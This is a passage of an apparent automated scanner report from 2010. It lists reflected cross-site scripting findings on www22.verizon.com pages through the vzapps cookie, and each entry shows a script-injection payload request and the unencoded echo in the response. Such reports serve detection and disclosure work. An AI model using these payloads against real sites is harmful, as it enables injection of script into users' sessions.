Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4eb83'><script>alert(1)</script>d3ff6108a2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71665
Expires: Sat, 20 Nov 2010 00:11:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4eb83'><script>alert(1)</script>d3ff6108a2c; path=/
Set-Cookie: ContextInfo_Equipment=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Receivers | HD DVR
</title><meta name="keywords" content="receiver, high definition receiver, hd reciever, dvr receiver, sd rece
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4EB83'><SCRIPT>ALERT(1)</SCRIPT>D3FF6108A2C ' />
...[SNIP]...

2.871. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a607'><script>alert(1)</script>d0ccb927d19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9a607'><script>alert(1)</script>d0ccb927d19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50560
Expires: Sat, 20 Nov 2010 00:09:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9a607'><script>alert(1)</script>d0ccb927d19; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9A607'><SCRIPT>ALERT(1)</SCRIPT>D0CCB927D19 ' />
...[SNIP]...

2.872. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Packages/Packages.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 474e8'><script>alert(1)</script>6198f299341 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Packages/Packages.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX474e8'><script>alert(1)</script>6198f299341; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65391
Expires: Sat, 20 Nov 2010 00:12:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX474e8'><script>alert(1)</script>6198f299341; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Packages | English
</title><meta name="keywords" content="spanish package, directv bundle package, bundle package, satellite bun
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX474E8'><SCRIPT>ALERT(1)</SCRIPT>6198F299341 ' />
...[SNIP]...

2.873. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Premium/Premium.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64704'><script>alert(1)</script>60e1cc3bb19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Premium/Premium.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX64704'><script>alert(1)</script>60e1cc3bb19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84381
Expires: Sat, 20 Nov 2010 00:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX64704'><script>alert(1)</script>60e1cc3bb19; path=/
Set-Cookie: ContextInfo_DTVPremium=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Premiums
</title><meta name="keywords" content="channels, premium programming, sports packages, movie packages, premium packages
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX64704'><SCRIPT>ALERT(1)</SCRIPT>60E1CC3BB19 ' />
...[SNIP]...

2.874. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/EntertainmentOnDemand/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ecc81'><script>alert(1)</script>633e3a55ed6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXecc81'><script>alert(1)</script>633e3a55ed6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50751
Expires: Sat, 20 Nov 2010 00:16:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXecc81'><script>alert(1)</script>633e3a55ed6; path=/
Set-Cookie: FLOWTYPE=VASIP; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Entertainment on Demand
</title><meta name="keywords" content="verizon entertainment on demand, verizon eod, verizon games, verizon movies
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXECC81'><SCRIPT>ALERT(1)</SCRIPT>633E3A55ED6 ' />
...[SNIP]...

2.875. http://www22.verizon.com/Residential/EntertainmentOnDemand/Games/Games.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/EntertainmentOnDemand/Games/Games.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 676cd'><script>alert(1)</script>a3a252376e7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Games/Games.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX676cd'><script>alert(1)</script>a3a252376e7; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75296
Expires: Sat, 20 Nov 2010 00:16:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX676cd'><script>alert(1)</script>a3a252376e7; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Entertainment on Demand: Games
</title><meta name="keywords" content="games, world of warcraft, internet games, online games, action game
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX676CD'><SCRIPT>ALERT(1)</SCRIPT>A3A252376E7 ' />
...[SNIP]...

2.876. http://www22.verizon.com/Residential/EntertainmentOnDemand/Movies/Movies.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/EntertainmentOnDemand/Movies/Movies.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46bbc'><script>alert(1)</script>e3e3a635f7b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Movies/Movies.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX46bbc'><script>alert(1)</script>e3e3a635f7b; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70797
Expires: Sat, 20 Nov 2010 00:16:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX46bbc'><script>alert(1)</script>e3e3a635f7b; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Entertainment on Demand: Movies
</title><meta name="keywords" content="video downloads, movie downloads, internet movie, internet televisi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX46BBC'><SCRIPT>ALERT(1)</SCRIPT>E3E3A635F7B ' />
...[SNIP]...

2.877. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 56c4c'><script>alert(1)</script>277bd852140 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX56c4c'><script>alert(1)</script>277bd852140; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119110
Expires: Sat, 20 Nov 2010 00:11:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX56c4c'><script>alert(1)</script>277bd852140; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX56C4C'><SCRIPT>ALERT(1)</SCRIPT>277BD852140 ' />
...[SNIP]...

2.878. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8b99'><script>alert(1)</script>47fb54bb178 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb8b99'><script>alert(1)</script>47fb54bb178; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69367
Expires: Sat, 20 Nov 2010 00:13:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=TXb8b99'><script>alert(1)</script>47fb54bb178; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB8B99'><SCRIPT>ALERT(1)</SCRIPT>47FB54BB178 ' />
...[SNIP]...

2.879. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f710f'><script>alert(1)</script>e2fd98d03b8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXf710f'><script>alert(1)</script>e2fd98d03b8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57182
Expires: Sat, 20 Nov 2010 00:09:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf710f'><script>alert(1)</script>e2fd98d03b8; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF710F'><SCRIPT>ALERT(1)</SCRIPT>E2FD98D03B8 ' />
...[SNIP]...

2.880. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 217f0'><script>alert(1)</script>c757f2d9905 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX217f0'><script>alert(1)</script>c757f2d9905; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69788
Expires: Sat, 20 Nov 2010 00:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:10 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX217f0'><script>alert(1)</script>c757f2d9905; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX217F0'><SCRIPT>ALERT(1)</SCRIPT>C757F2D9905 ' />
...[SNIP]...

2.881. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77bd6'><script>alert(1)</script>866fecce315 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
